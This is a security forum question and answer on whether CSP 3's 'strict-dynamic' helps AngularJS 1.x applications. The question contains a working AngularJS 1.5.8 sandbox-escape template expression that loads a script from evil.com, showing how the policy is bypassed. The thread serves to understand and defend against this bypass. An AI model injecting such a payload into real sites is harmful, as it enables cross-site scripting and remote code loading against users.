# Is there any point in using 'strict-dynamic' in an AngularJS 1.x application?

Tags: xss, content-security-policy, angularjs

I do not see the point in using CSP 3's new `strict-dynamic` in the case of an AngularJS 1.x application.

As far as I can tell, using `strict-dynamic` still allows arbitrary Javascript injection via a sandbox escape in a template:

```
<html>
  <head>
    <title>Angular - Alert in Expression</title>
    <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.5.8/angular.min.js"></script>
  </head>
  <body ng-app="" ng-csp>
    <div>{{a=toString().constructor.prototype;a.charAt=a.trim;$eval('a,a=document.createElement("script"),a.src="https://evil.com/evil.js",a.type="text/javascript",a=document.getElementsByTagName("head")[0].appendChild(a),a')}}</div>
  </body>
</html>
```

The worst thing is, the script injection above is allowed by `strict-dynamic`, whereas a reasonable host-based CSP `script-src` would block it.

So, is there any reason to use `strict-dynamic` on an application that uses AngularJS?

Answer (score 3):

There is a bit of a fundamental security issue here based on the fact that an attacker can inject an Angular expression.  The Angular project itself has actually stated that the sandbox is not actually a security mechanism, despite the name, and removed it in newer versions to avoid this confusion:

http://angularjs.blogspot.com/2016/09/angular-16-expression-sandbox-removal.html

In the case you are talking about, I would probably characterize this as working as intended, but not necessarily expected.  CSP is protecting the script elements to ensure that only trusted ones are executed, but Angular (your trusted script) is being coerced into 'interpreting' the expression in a CSP-compliant way (if you're using ng-csp) that yields the equivalent of script execution.